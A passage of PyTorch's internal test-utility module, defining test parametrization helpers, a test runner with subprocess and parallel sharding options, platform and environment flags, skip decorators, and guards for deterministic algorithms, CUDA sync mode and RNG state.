full_name = '{}_{}'.format(test.__name__, test_suffix)
instantiate_test_helper(cls=generic_cls, name=full_name, test=test, param_kwargs=param_kwargs)
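# Illustrative sketch (not part of the original helpers): how a test module might
# combine @parametrize with instantiate_parametrized_tests(). The class and test
# names below are hypothetical; calling the helper replaces test_add with
# per-parameter tests such as test_add_x_1_y_2 on the class.
def _example_instantiate_parametrized_tests():
    class _ExampleParamTests(unittest.TestCase):
        @parametrize("x,y", [(1, 2), (3, 4)])
        def test_add(self, x, y):
            self.assertEqual(x + y, y + x)

    instantiate_parametrized_tests(_ExampleParamTests)
    return _ExampleParamTests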
class subtest(object):
"""
Explicit subtest case for use with test parametrization.
Allows for explicit naming of individual subtest cases as well as applying
decorators to the parametrized test.
Args:
arg_values (iterable): Iterable of arg values (e.g. range(10)) or
tuples of arg values (e.g. [(1, 2), (3, 4)]).
name (str): Optional name to use for the test.
decorators (iterable): Iterable of decorators to apply to the generated test.
"""
__slots__ = ['arg_values', 'name', 'decorators']
def __init__(self, arg_values, name=None, decorators=None):
self.arg_values = arg_values
self.name = name
self.decorators = decorators if decorators else []
class parametrize(_TestParametrizer):
"""
Decorator for applying generic test parametrizations.
The interface for this decorator is modeled after `@pytest.mark.parametrize`.
Basic usage between this decorator and pytest's is identical. The first argument
should be a string containing comma-separated names of parameters for the test, and
the second argument should be an iterable returning values or tuples of values for
the case of multiple parameters.
Beyond this basic usage, the decorator provides some additional functionality that
pytest does not.
1. Parametrized tests end up as generated test functions on unittest test classes.
Since this differs from how pytest works, this decorator takes on the additional
    responsibility of naming these test functions. The default test names consist of
the test's base name followed by each parameter name + value (e.g. "test_bar_x_1_y_foo"),
but custom names can be defined using `name_fn` or the `subtest` structure (see below).
2. The decorator specially handles parameter values of type `subtest`, which allows for
more fine-grained control over both test naming and test execution. In particular, it can
be used to tag subtests with explicit test names or apply arbitrary decorators (see examples
below).
Examples::
@parametrize("x", range(5))
def test_foo(self, x):
...
@parametrize("x,y", [(1, 'foo'), (2, 'bar'), (3, 'baz')])
def test_bar(self, x, y):
...
@parametrize("x,y", [(1, 'foo'), (2, 'bar'), (3, 'baz')],
name_fn=lambda x, y: '{}_{}'.format(x, y))
def test_bar_custom_names(self, x, y):
...
@parametrize("x, y", [subtest((1, 2), name='double'),
subtest((1, 3), name='triple', decorators=[unittest.expectedFailure]),
subtest((1, 4), name='quadruple')])
def test_baz(self, x, y):
...
Args:
        arg_str (str): String of arg names separated by commas (e.g. "x,y").
arg_values (iterable): Iterable of arg values (e.g. range(10)) or
tuples of arg values (e.g. [(1, 2), (3, 4)]).
name_fn (callable): Optional function that takes in parameters and returns subtest name.
"""
def __init__(self, arg_str, arg_values, name_fn=None):
super().__init__(handles_dtypes=False)
self.arg_names = arg_str.split(',')
self.arg_values = arg_values
self.name_fn = name_fn
def _formatted_str_repr(self, name, value):
""" Returns a string representation for the given arg that is suitable for use in test function names. """
if isinstance(value, torch.dtype):
return dtype_name(value)
elif isinstance(value, torch.device):
return str(value)
# Can't use isinstance as it would cause a circular import
elif value.__class__.__name__ == 'OpInfo' or value.__class__.__name__ == 'ModuleInfo':
return value.formatted_name
else:
# Include name and value separated by underscore.
return '{}_{}'.format(name, str(value).replace('.', '_'))
def _default_subtest_name(self, values):
return '_'.join([self._formatted_str_repr(a, v) for a, v in zip(self.arg_names, values)])
def _get_subtest_name(self, values, explicit_name=None):
if explicit_name:
subtest_name = explicit_name
elif self.name_fn:
subtest_name = self.name_fn(*values)
else:
subtest_name = self._default_subtest_name(values)
return subtest_name
def _parametrize_test(self, test, generic_cls, device_cls):
if len(self.arg_names) == 0:
# No additional parameters needed for the test.
test_name = device_cls.device_type if device_cls else ''
yield (test, test_name, {})
else:
# Each "values" item is expected to be either:
# * A tuple of values with one for each arg. For a single arg, a single item is expected.
# * A subtest instance with arg_values matching the previous.
for values in self.arg_values:
maybe_name = None
if isinstance(values, subtest):
sub = values
values = sub.arg_values
maybe_name = sub.name
# Apply decorators.
@wraps(test)
def test_wrapper(*args, **kwargs):
return test(*args, **kwargs)
for decorator in sub.decorators:
test_wrapper = decorator(test_wrapper)
gen_test = test_wrapper
else:
gen_test = test
values = list(values) if len(self.arg_names) > 1 else [values]
if len(values) != len(self.arg_names):
raise RuntimeError('Expected # values == # arg names, but got: {} '
'values and {} names for test "{}"'.format(
len(values), len(self.arg_names), test.__name__))
param_kwargs = {
name: value for name, value in zip(self.arg_names, values)
}
subtest_name = self._get_subtest_name(values, explicit_name=maybe_name)
test_name = '{}{}'.format(subtest_name, '_' + device_cls.device_type if device_cls else '')
if '.' in test_name:
raise RuntimeError('Test name cannot contain periods, but got: {}'.format(test_name))
yield (gen_test, test_name, param_kwargs)
class ProfilingMode(Enum):
LEGACY = 1
SIMPLE = 2
PROFILING = 3
def cppProfilingFlagsToProfilingMode():
old_prof_exec_state = torch._C._jit_set_profiling_executor(True)
old_prof_mode_state = torch._C._jit_set_profiling_mode(True)
torch._C._jit_set_profiling_executor(old_prof_exec_state)
torch._C._jit_set_profiling_mode(old_prof_mode_state)
if old_prof_exec_state:
if old_prof_mode_state:
return ProfilingMode.PROFILING
else:
return ProfilingMode.SIMPLE
else:
return ProfilingMode.LEGACY
@contextmanager
def enable_profiling_mode_for_profiling_tests():
if GRAPH_EXECUTOR == ProfilingMode.PROFILING:
old_prof_exec_state = torch._C._jit_set_profiling_executor(True)
old_prof_mode_state = torch._C._jit_set_profiling_mode(True)
try:
yield
finally:
if GRAPH_EXECUTOR == ProfilingMode.PROFILING:
torch._C._jit_set_profiling_executor(old_prof_exec_state)
torch._C._jit_set_profiling_mode(old_prof_mode_state)
@contextmanager
def enable_profiling_mode():
old_prof_exec_state = torch._C._jit_set_profiling_executor(True)
old_prof_mode_state = torch._C._jit_set_profiling_mode(True)
try:
yield
finally:
torch._C._jit_set_profiling_executor(old_prof_exec_state)
torch._C._jit_set_profiling_mode(old_prof_mode_state)
@contextmanager
def num_profiled_runs(num_runs):
old_num_runs = torch._C._jit_set_num_profiled_runs(num_runs)
try:
yield
finally:
torch._C._jit_set_num_profiled_runs(old_num_runs)
func_call = torch._C.ScriptFunction.__call__
meth_call = torch._C.ScriptMethod.__call__
def prof_callable(callable, *args, **kwargs):
if 'profile_and_replay' in kwargs:
del kwargs['profile_and_replay']
if GRAPH_EXECUTOR == ProfilingMode.PROFILING:
with enable_profiling_mode_for_profiling_tests():
callable(*args, **kwargs)
return callable(*args, **kwargs)
return callable(*args, **kwargs)
def prof_func_call(*args, **kwargs):
return prof_callable(func_call, *args, **kwargs)
def prof_meth_call(*args, **kwargs):
return prof_callable(meth_call, *args, **kwargs)
# TODO fix when https://github.com/python/mypy/issues/2427 is addressed
torch._C.ScriptFunction.__call__ = prof_func_call # type: ignore[assignment]
torch._C.ScriptMethod.__call__ = prof_meth_call # type: ignore[assignment]
def _get_test_report_path():
# allow users to override the test file location. We need this
# because the distributed tests run the same test file multiple
# times with different configurations.
override = os.environ.get('TEST_REPORT_SOURCE_OVERRIDE')
test_source = override if override is not None else 'python-unittest'
return os.path.join('test-reports', test_source)
parser = argparse.ArgumentParser()
parser.add_argument('--subprocess', action='store_true',
help='whether to run each test in a subprocess')
parser.add_argument('--seed', type=int, default=1234)
parser.add_argument('--accept', action='store_true')
parser.add_argument('--jit_executor', type=str)
parser.add_argument('--repeat', type=int, default=1)
parser.add_argument('--test_bailouts', action='store_true')
parser.add_argument('--save-xml', nargs='?', type=str,
const=_get_test_report_path(),
default=_get_test_report_path() if IS_IN_CI else None)
parser.add_argument('--discover-tests', action='store_true')
parser.add_argument('--log-suffix', type=str, default="")
parser.add_argument('--run-parallel', type=int, default=1)
parser.add_argument('--import-slow-tests', type=str, nargs='?', const=SLOW_TESTS_FILE)
parser.add_argument('--import-disabled-tests', type=str, nargs='?', const=DISABLED_TESTS_FILE)
# Only run when -h or --help flag is active to display both unittest and parser help messages.
def run_unittest_help(argv):
unittest.main(argv=argv)
if '-h' in sys.argv or '--help' in sys.argv:
help_thread = threading.Thread(target=run_unittest_help, args=(sys.argv,))
help_thread.start()
help_thread.join()
args, remaining = parser.parse_known_args()
if args.jit_executor == 'legacy':
GRAPH_EXECUTOR = ProfilingMode.LEGACY
elif args.jit_executor == 'profiling':
GRAPH_EXECUTOR = ProfilingMode.PROFILING
elif args.jit_executor == 'simple':
GRAPH_EXECUTOR = ProfilingMode.SIMPLE
else:
# infer flags based on the default settings
GRAPH_EXECUTOR = cppProfilingFlagsToProfilingMode()
IMPORT_SLOW_TESTS = args.import_slow_tests
IMPORT_DISABLED_TESTS = args.import_disabled_tests
LOG_SUFFIX = args.log_suffix
RUN_PARALLEL = args.run_parallel
TEST_BAILOUTS = args.test_bailouts
TEST_DISCOVER = args.discover_tests
TEST_IN_SUBPROCESS = args.subprocess
TEST_SAVE_XML = args.save_xml
REPEAT_COUNT = args.repeat
SEED = args.seed
if not expecttest.ACCEPT:
expecttest.ACCEPT = args.accept
UNITTEST_ARGS = [sys.argv[0]] + remaining
torch.manual_seed(SEED)
# CI prefix path, used only in the CI environment
CI_TEST_PREFIX = str(Path(os.getcwd()))
def wait_for_process(p):
try:
return p.wait()
except KeyboardInterrupt:
# Give `p` a chance to handle KeyboardInterrupt. Without this,
# `pytest` can't print errors it collected so far upon KeyboardInterrupt.
exit_status = p.wait(timeout=5)
if exit_status is not None:
return exit_status
else:
p.kill()
raise
except: # noqa: B001,E722, copied from python core library
p.kill()
raise
finally:
# Always call p.wait() to ensure exit
p.wait()
def shell(command, cwd=None, env=None):
sys.stdout.flush()
sys.stderr.flush()
# The following cool snippet is copied from Py3 core library subprocess.call
    # with only the following changes:
    # 1. `except KeyboardInterrupt` block added for SIGINT handling.
    # 2. In Py2, subprocess.Popen doesn't return a context manager, so we do
    #    `p.wait()` in a `finally` block for the code to be portable.
#
# https://github.com/python/cpython/blob/71b6c1af727fbe13525fb734568057d78cea33f3/Lib/subprocess.py#L309-L323
assert not isinstance(command, torch._six.string_classes), "Command to shell should be a list or tuple of tokens"
p = subprocess.Popen(command, universal_newlines=True, cwd=cwd, env=env)
return wait_for_process(p)
# Used to run the same test with different tensor types
def repeat_test_for_types(dtypes):
def repeat_helper(f):
@wraps(f)
def call_helper(self, *args):
for dtype in dtypes:
with TestCase.subTest(self, dtype=dtype):
f(self, *args, dtype=dtype)
return call_helper
return repeat_helper
def discover_test_cases_recursively(suite_or_case):
if isinstance(suite_or_case, unittest.TestCase):
return [suite_or_case]
rc = []
for element in suite_or_case:
print(element)
rc.extend(discover_test_cases_recursively(element))
return rc
def get_test_names(test_cases):
return ['.'.join(case.id().split('.')[-2:]) for case in test_cases]
def _print_test_names():
suite = unittest.TestLoader().loadTestsFromModule(__main__)
test_cases = discover_test_cases_recursively(suite)
for name in get_test_names(test_cases):
print(name)
def chunk_list(lst, nchunks):
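    # Round-robin split, e.g. chunk_list(list(range(10)), 3) -> [[0, 3, 6, 9], [1, 4, 7], [2, 5, 8]]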
return [lst[i::nchunks] for i in range(nchunks)]
# sanitize filename e.g., distributed/pipeline/sync/skip/test_api.py -> distributed.pipeline.sync.skip.test_api
def sanitize_test_filename(filename):
# inspect.getfile returns absolute path in some CI jobs, converting it to relative path if needed
if filename.startswith(CI_TEST_PREFIX):
filename = filename[len(CI_TEST_PREFIX) + 1:]
strip_py = re.sub(r'.py$', '', filename)
return re.sub('/', r'.', strip_py)
def lint_test_case_extension(suite):
succeed = True
for test_case_or_suite in suite:
test_case = test_case_or_suite
if isinstance(test_case_or_suite, unittest.TestSuite):
first_test = test_case_or_suite._tests[0] if len(test_case_or_suite._tests) > 0 else None
if first_test is not None and isinstance(first_test, unittest.TestSuite):
return succeed and lint_test_case_extension(test_case_or_suite)
test_case = first_test
if test_case is not None:
test_class = test_case.id().split('.', 1)[1].split('.')[0]
if not isinstance(test_case, TestCase):
err = "This test class should extend from torch.testing._internal.common_utils.TestCase but it doesn't."
print(f"{test_class} - failed. {err}")
succeed = False
return succeed
def run_tests(argv=UNITTEST_ARGS):
# import test files.
if IMPORT_SLOW_TESTS:
if os.path.exists(IMPORT_SLOW_TESTS):
global slow_tests_dict
with open(IMPORT_SLOW_TESTS, 'r') as fp:
slow_tests_dict = json.load(fp)
else:
print(f'[WARNING] slow test file provided but not found: {IMPORT_SLOW_TESTS}')
if IMPORT_DISABLED_TESTS:
if os.path.exists(IMPORT_DISABLED_TESTS):
global disabled_tests_dict
with open(IMPORT_DISABLED_TESTS, 'r') as fp:
disabled_tests_dict = json.load(fp)
else:
print(f'[WARNING] disabled test file provided but not found: {IMPORT_DISABLED_TESTS}')
# Determine the test launch mechanism
if TEST_DISCOVER:
_print_test_names()
return
# Before running the tests, lint to check that every test class extends from TestCase
suite = unittest.TestLoader().loadTestsFromModule(__main__)
if not lint_test_case_extension(suite):
sys.exit(1)
if TEST_IN_SUBPROCESS:
failed_tests = []
test_cases = discover_test_cases_recursively(suite)
for case in test_cases:
test_case_full_name = case.id().split('.', 1)[1]
            other_args = []
            if IMPORT_DISABLED_TESTS:
                other_args.append('--import-disabled-tests')
            if IMPORT_SLOW_TESTS:
                other_args.append('--import-slow-tests')
cmd = [sys.executable] + [argv[0]] + other_args + argv[1:] + [test_case_full_name]
string_cmd = " ".join(cmd)
exitcode = shell(cmd)
if exitcode != 0:
# This is sort of hacky, but add on relevant env variables for distributed tests.
if 'TestDistBackendWithSpawn' in test_case_full_name:
backend = os.environ.get("BACKEND", "")
world_size = os.environ.get("WORLD_SIZE", "")
env_prefix = f"BACKEND={backend} WORLD_SIZE={world_size}"
string_cmd = env_prefix + " " + string_cmd
# Log the command to reproduce the failure.
print(f"Test exited with non-zero exitcode {exitcode}. Command to reproduce: {string_cmd}")
failed_tests.append(test_case_full_name)
assert len(failed_tests) == 0, "{} unit test(s) failed:\n\t{}".format(
len(failed_tests), '\n\t'.join(failed_tests))
elif RUN_PARALLEL > 1:
test_cases = discover_test_cases_recursively(suite)
test_batches = chunk_list(get_test_names(test_cases), RUN_PARALLEL)
processes = []
for i in range(RUN_PARALLEL):
command = [sys.executable] + argv + ['--log-suffix=-shard-{}'.format(i + 1)] + test_batches[i]
processes.append(subprocess.Popen(command, universal_newlines=True))
failed = False
for p in processes:
failed |= wait_for_process(p) != 0
assert not failed, "Some test shards have failed"
elif TEST_SAVE_XML is not None:
# import here so that non-CI doesn't need xmlrunner installed
import xmlrunner # type: ignore[import]
test_filename = sanitize_test_filename(inspect.getfile(sys._getframe(1)))
test_report_path = TEST_SAVE_XML + LOG_SUFFIX
test_report_path = os.path.join(test_report_path, test_filename)
os.makedirs(test_report_path, exist_ok=True)
verbose = '--verbose' in argv or '-v' in argv
if verbose:
print('Test results will be stored in {}'.format(test_report_path))
unittest.main(argv=argv, testRunner=xmlrunner.XMLTestRunner(output=test_report_path, verbosity=2 if verbose else 1))
elif REPEAT_COUNT > 1:
for _ in range(REPEAT_COUNT):
if not unittest.main(exit=False, argv=argv).result.wasSuccessful():
sys.exit(-1)
else:
unittest.main(argv=argv)
IS_LINUX = sys.platform == "linux"
IS_WINDOWS = sys.platform == "win32"
IS_MACOS = sys.platform == "darwin"
IS_PPC = platform.machine() == "ppc64le"
def is_avx512_vnni_supported():
if sys.platform != 'linux':
return False
with open("/proc/cpuinfo", encoding="ascii") as f:
lines = f.read()
return "vnni" in lines
IS_AVX512_VNNI_SUPPORTED = is_avx512_vnni_supported()
if IS_WINDOWS:
@contextmanager
def TemporaryFileName(*args, **kwargs):
# Ideally we would like to not have to manually delete the file, but NamedTemporaryFile
# opens the file, and it cannot be opened multiple times in Windows. To support Windows,
# close the file after creation and try to remove it manually
if 'delete' in kwargs:
if kwargs['delete'] is not False:
raise UserWarning("only TemporaryFileName with delete=False is supported on Windows.")
else:
kwargs['delete'] = False
f = tempfile.NamedTemporaryFile(*args, **kwargs)
try:
f.close()
yield f.name
finally:
os.unlink(f.name)
else:
@contextmanager # noqa: T484
def TemporaryFileName(*args, **kwargs):
with tempfile.NamedTemporaryFile(*args, **kwargs) as f:
yield f.name
if IS_WINDOWS:
@contextmanager
def TemporaryDirectoryName(suffix=None):
# On Windows the directory created by TemporaryDirectory is likely to be removed prematurely,
# so we first create the directory using mkdtemp and then remove it manually
try:
dir_name = tempfile.mkdtemp(suffix=suffix)
yield dir_name
finally:
shutil.rmtree(dir_name)
else:
@contextmanager # noqa: T484
def TemporaryDirectoryName(suffix=None):
with tempfile.TemporaryDirectory(suffix=suffix) as d:
yield d
IS_FILESYSTEM_UTF8_ENCODING = sys.getfilesystemencoding() == 'utf-8'
def _check_module_exists(name: str) -> bool:
r"""Returns if a top-level module with :attr:`name` exists *without**
importing it. This is generally safer than try-catch block around a
`import X`. It avoids third party libraries breaking assumptions of some of
our tests, e.g., setting multiprocessing start method when imported
(see librosa/#747, torchvision/#544).
"""
try:
import importlib.util
spec = importlib.util.find_spec(name)
return spec is not None
except ImportError:
return False
TEST_NUMPY = _check_module_exists('numpy')
TEST_SCIPY = _check_module_exists('scipy')
TEST_MKL = torch.backends.mkl.is_available()
TEST_NUMBA = _check_module_exists('numba')
TEST_DILL = _check_module_exists('dill')
TEST_LIBROSA = _check_module_exists('librosa')
BUILD_WITH_CAFFE2 = _check_module_exists("caffe2.python.caffe2_pybind11_state")
# Python 2.7 doesn't have spawn
NO_MULTIPROCESSING_SPAWN = os.environ.get('NO_MULTIPROCESSING_SPAWN', '0') == '1'
TEST_WITH_ASAN = os.getenv('PYTORCH_TEST_WITH_ASAN', '0') == '1'
TEST_WITH_DEV_DBG_ASAN = os.getenv('PYTORCH_TEST_WITH_DEV_DBG_ASAN', '0') == '1'
TEST_WITH_TSAN = os.getenv('PYTORCH_TEST_WITH_TSAN', '0') == '1'
TEST_WITH_UBSAN = os.getenv('PYTORCH_TEST_WITH_UBSAN', '0') == '1'
TEST_WITH_ROCM = os.getenv('PYTORCH_TEST_WITH_ROCM', '0') == '1'
# TODO: Remove PYTORCH_MIOPEN_SUGGEST_NHWC once ROCm officially supports NHWC in MIOpen
# See #64427
TEST_WITH_MIOPEN_SUGGEST_NHWC = os.getenv('PYTORCH_MIOPEN_SUGGEST_NHWC', '0') == '1'
# Enables tests that are slow to run (disabled by default)
TEST_WITH_SLOW = os.getenv('PYTORCH_TEST_WITH_SLOW', '0') == '1'
# Disables non-slow tests (these tests are enabled by default).
# This is usually used in conjunction with TEST_WITH_SLOW to
# run *only* slow tests. (I could have done an enum, but
# it felt a little awkward.)
TEST_SKIP_FAST = os.getenv('PYTORCH_TEST_SKIP_FAST', '0') == '1'
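# For example (illustrative), to run *only* the slow tests in a test script,
# both flags can be combined:
#
#   PYTORCH_TEST_WITH_SLOW=1 PYTORCH_TEST_SKIP_FAST=1 python test_torch.py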
# Disables noarch tests; all but one CI configuration disables these. We don't
# disable them for local runs because you still want to run them
# (unlike slow tests!)
TEST_SKIP_NOARCH = os.getenv('PYTORCH_TEST_SKIP_NOARCH', '0') == '1'
# Determine whether to enable cuda memory leak check.
# CUDA mem leak check is expensive and thus we don't want to execute it on every
# test case / configuration.
# See: https://github.com/pytorch/pytorch/pull/59402#issuecomment-858811135
TEST_SKIP_CUDA_MEM_LEAK_CHECK = os.getenv('PYTORCH_TEST_SKIP_CUDA_MEM_LEAK_CHECK', '0') == '1'
# Disables tests when running on GitHub Actions
ON_GHA = os.getenv('GITHUB_ACTIONS', '0') == '1'
# True if CI is running TBB-enabled Pytorch
IS_TBB = "tbb" in os.getenv("BUILD_ENVIRONMENT", "")
# Dict of NumPy dtype -> torch dtype (when the correspondence exists)
numpy_to_torch_dtype_dict = {
np.bool_ : torch.bool,
np.uint8 : torch.uint8,
np.int8 : torch.int8,
np.int16 : torch.int16,
np.int32 : torch.int32,
np.int64 : torch.int64,
np.float16 : torch.float16,
np.float32 : torch.float32,
np.float64 : torch.float64,
np.complex64 : torch.complex64,
np.complex128 : torch.complex128
}
if IS_WINDOWS:
# Size of `np.intc` is platform defined.
# It is returned by functions like `bitwise_not`.
# On Windows `int` is 32-bit
# https://docs.microsoft.com/en-us/cpp/cpp/data-type-ranges?view=msvc-160
numpy_to_torch_dtype_dict[np.intc] = torch.int
# Dict of torch dtype -> NumPy dtype
torch_to_numpy_dtype_dict = {value : key for (key, value) in numpy_to_torch_dtype_dict.items()}
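# A quick sanity check of the mappings above (illustrative):
#
#   numpy_to_torch_dtype_dict[np.float32]   # -> torch.float32
#   torch_to_numpy_dtype_dict[torch.int64]  # -> np.int64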
ALL_TENSORTYPES = [torch.float,
torch.double,
torch.half]
# bfloat16 bringup is currently only available on ROCm
# ALL_TENSORTYPES2 will eventually be unified with ALL_TENSORTYPES
# when bfloat16 bringup is complete on all platforms
if TEST_WITH_ROCM:
ALL_TENSORTYPES2 = [torch.float,
torch.double,
torch.half,
torch.bfloat16]
else:
ALL_TENSORTYPES2 = ALL_TENSORTYPES
def skipIfRocm(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
if TEST_WITH_ROCM:
raise unittest.SkipTest("test doesn't currently work on the ROCm stack")
else:
fn(*args, **kwargs)
return wrapper
# Skips a test if ROCm is unavailable or its version is lower than requested.
def skipIfRocmVersionLessThan(version=None):
def dec_fn(fn):
@wraps(fn)
def wrap_fn(self, *args, **kwargs):
if not TEST_WITH_ROCM:
reason = "ROCm not available"
raise unittest.SkipTest(reason)
rocm_version = str(torch.version.hip)
rocm_version = rocm_version.split("-")[0] # ignore git sha
rocm_version_tuple = tuple(int(x) for x in rocm_version.split("."))
if rocm_version_tuple is None or version is None or rocm_version_tuple < tuple(version):
reason = "ROCm {0} is available but {1} required".format(rocm_version_tuple, version)
raise unittest.SkipTest(reason)
return fn(self, *args, **kwargs)
return wrap_fn
return dec_fn
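# Example usage (illustrative sketch; the test name and version are hypothetical):
#
#   @skipIfRocmVersionLessThan((4, 3))
#   def test_foo(self):
#       ...  # runs only on ROCm builds with version >= 4.3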
def skipIfNotMiopenSuggestNHWC(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
if not TEST_WITH_MIOPEN_SUGGEST_NHWC:
raise unittest.SkipTest("test doesn't currently work without MIOpen NHWC activation")
else:
fn(*args, **kwargs)
return wrapper
# Context manager for setting deterministic flag and automatically
# resetting it to its original value
class DeterministicGuard:
def __init__(self, deterministic, *, warn_only=False):
self.deterministic = deterministic
self.warn_only = warn_only
def __enter__(self):
self.deterministic_restore = torch.are_deterministic_algorithms_enabled()
self.warn_only_restore = torch.is_deterministic_algorithms_warn_only_enabled()
torch.use_deterministic_algorithms(
self.deterministic,
warn_only=self.warn_only)
def __exit__(self, exception_type, exception_value, traceback):
torch.use_deterministic_algorithms(
self.deterministic_restore,
warn_only=self.warn_only_restore)
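# Example usage (illustrative sketch; `op` and `inp` are hypothetical):
#
#   with DeterministicGuard(True):
#       out = op(inp)  # runs with torch.use_deterministic_algorithms(True)
#   # the previous deterministic/warn_only settings are restored on exit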
# Context manager for setting CUDA sync debug mode and resetting it
# to its original value.
# we are not exposing it to the core because sync debug mode is
# global and thus not thread safe
class CudaSyncGuard:
def __init__(self, sync_debug_mode):
self.mode = sync_debug_mode
def __enter__(self):
self.debug_mode_restore = torch.cuda.get_sync_debug_mode()
torch.cuda.set_sync_debug_mode(self.mode)
def __exit__(self, exception_type, exception_value, traceback):
torch.cuda.set_sync_debug_mode(self.debug_mode_restore)
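# Example usage (illustrative sketch; "warn" is one of the modes accepted by
# torch.cuda.set_sync_debug_mode):
#
#   with CudaSyncGuard("warn"):
#       ...  # synchronizing CUDA calls emit warnings inside this block
#   # the previous sync debug mode is restored on exit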
# This decorator can be used for API tests that call
# torch.use_deterministic_algorithms(). When the test is finished, it will
# restore the previous deterministic flag setting.
#
# If CUDA >= 10.2, this will set the environment variable
# CUBLAS_WORKSPACE_CONFIG=:4096:8 so that the error associated with that
# setting is not thrown during the test unless the test changes that variable
# on purpose. The previous CUBLAS_WORKSPACE_CONFIG setting will also be
# restored once the test is finished.
#
# Note that if a test requires CUDA to actually register the changed
# CUBLAS_WORKSPACE_CONFIG variable, a new subprocess must be created, because
# CUDA only checks the variable when the runtime initializes. Tests can be
# run inside a subprocess like so:
#
# import subprocess, sys, os
# script = '''
# # Test code should go here
# '''
# try:
# subprocess.check_output(
# [sys.executable, '-c', script],
# stderr=subprocess.STDOUT,
# cwd=os.path.dirname(os.path.realpath(__file__)),
# env=os.environ.copy())
# except subprocess.CalledProcessError as e:
# error_message = e.output.decode('utf-8')
# # Handle exceptions raised by the subprocess here
#
def wrapDeterministicFlagAPITest(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
with DeterministicGuard(
torch.are_deterministic_algorithms_enabled(),
warn_only=torch.is_deterministic_algorithms_warn_only_enabled()):
class CuBLASConfigGuard:
cublas_var_name = 'CUBLAS_WORKSPACE_CONFIG'
def __enter__(self):
self.is_cuda10_2_or_higher = (
(torch.version.cuda is not None)
and ([int(x) for x in torch.version.cuda.split(".")] >= [10, 2]))
if self.is_cuda10_2_or_higher:
self.cublas_config_restore = os.environ.get(self.cublas_var_name)
os.environ[self.cublas_var_name] = ':4096:8'
def __exit__(self, exception_type, exception_value, traceback):
if self.is_cuda10_2_or_higher:
cur_cublas_config = os.environ.get(self.cublas_var_name)
if self.cublas_config_restore is None:
if cur_cublas_config is not None:
del os.environ[self.cublas_var_name]
else:
os.environ[self.cublas_var_name] = self.cublas_config_restore
with CuBLASConfigGuard():
fn(*args, **kwargs)
return wrapper
def skipIfCompiledWithoutNumpy(fn):
# Even if the numpy module is present, if `USE_NUMPY=0` is used during the
# build, numpy tests will fail
numpy_support = TEST_NUMPY
if numpy_support:
try:
# The numpy module is present, verify that PyTorch is compiled with
# numpy support
torch.from_numpy(np.array([2, 2]))
except RuntimeError:
numpy_support = False
@wraps(fn)
def wrapper(*args, **kwargs):
if not numpy_support:
raise unittest.SkipTest("PyTorch was compiled without numpy support")
else:
fn(*args, **kwargs)
return wrapper
def _test_function(fn, device):
def run_test_function(self):
return fn(self, device)
return run_test_function
def skipIfNoLapack(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
if not torch._C.has_lapack:
raise unittest.SkipTest('PyTorch compiled without Lapack')
else:
fn(*args, **kwargs)
return wrapper
def skipIfNotRegistered(op_name, message):
"""Wraps the decorator to hide the import of the `core`.
Args:
op_name: Check if this op is registered in `core._REGISTERED_OPERATORS`.
message: message to fail with.
Usage:
@skipIfNotRegistered('MyOp', 'MyOp is not linked!')
This will check if 'MyOp' is in the caffe2.python.core
"""
if not BUILD_WITH_CAFFE2:
return unittest.skip("Pytorch is compiled without Caffe2")
try:
from caffe2.python import core
skipper = unittest.skipIf(op_name not in core._REGISTERED_OPERATORS,
message)
except ImportError:
skipper = unittest.skip("Cannot import `caffe2.python.core`")
return skipper
def skipIfNoSciPy(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
if not TEST_SCIPY:
raise unittest.SkipTest("test require SciPy, but SciPy not found")
else:
fn(*args, **kwargs)
return wrapper
def skipIfOnGHA(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
if ON_GHA:
raise unittest.SkipTest("Test disabled for GHA")
else:
fn(*args, **kwargs)
return wrapper
def skipIfTBB(message="This test makes TBB sad"):
def dec_fn(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
if IS_TBB:
raise unittest.SkipTest(message)
else:
fn(*args, **kwargs)
return wrapper
return dec_fn
def slowTest(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
if not TEST_WITH_SLOW:
raise unittest.SkipTest("test is slow; run with PYTORCH_TEST_WITH_SLOW to enable test")
else:
fn(*args, **kwargs)
wrapper.__dict__['slow_test'] = True
return wrapper
# noarch tests are tests that should be only run on one CI configuration,
# because they don't exercise any interesting platform specific code
# and so if run once, indicate the test should pass everywhere.
# See https://github.com/pytorch/pytorch/issues/53743
def noarchTest(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
if TEST_SKIP_NOARCH:
raise unittest.SkipTest("test is noarch: we are skipping noarch tests due to TEST_SKIP_NOARCH")
else:
fn(*args, **kwargs)
return wrapper
def slowAwareTest(fn):
fn.__dict__['slow_test'] = True
return fn
def skipCUDAMemoryLeakCheckIf(condition):
def dec(fn):
if getattr(fn, '_do_cuda_memory_leak_check', True):  # if the current value is True
fn._do_cuda_memory_leak_check = not condition
return fn
return dec
def skipCUDANonDefaultStreamIf(condition):
def dec(fn):
if getattr(fn, '_do_cuda_non_default_stream', True):  # if the current value is True
fn._do_cuda_non_default_stream = not condition
return fn
return dec
def suppress_warnings(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
with warnings.catch_warnings():
warnings.simplefilter("ignore")
fn(*args, **kwargs)
return wrapper
def to_gpu(obj, type_map=None):
if type_map is None:
type_map = {}
if isinstance(obj, torch.Tensor):
assert obj.is_leaf
t = type_map.get(obj.dtype, obj.dtype)
with torch.no_grad():
res = obj.clone().to(dtype=t, device="cuda")
res.requires_grad = obj.requires_grad
return res
elif torch.is_storage(obj):
return obj.new().resize_(obj.size()).copy_(obj)
elif isinstance(obj, list):
return [to_gpu(o, type_map) for o in obj]
elif isinstance(obj, tuple):
return tuple(to_gpu(o, type_map) for o in obj)
else:
return deepcopy(obj)
def get_function_arglist(func):
return inspect.getfullargspec(func).args
def set_rng_seed(seed):
torch.manual_seed(seed)
random.seed(seed)
if TEST_NUMPY:
np.random.seed(seed)
@contextlib.contextmanager
def freeze_rng_state():
rng_state = torch.get_rng_state()
if torch.cuda.is_available():
cuda_rng_state = torch.cuda.get_rng_state()
yield
if torch.cuda.is_available():
torch.cuda.set_rng_state(cuda_rng_state)
torch.set_rng_state(rng_state)
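# Example (illustrative): because the RNG state is restored on exit, the two
# draws below produce identical values.
#
#   with freeze_rng_state():
#       a = torch.rand(3)
#   b = torch.rand(3)  # same values as `a`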
@contextlib.contextmanager
def set_default_dtype(dtype):
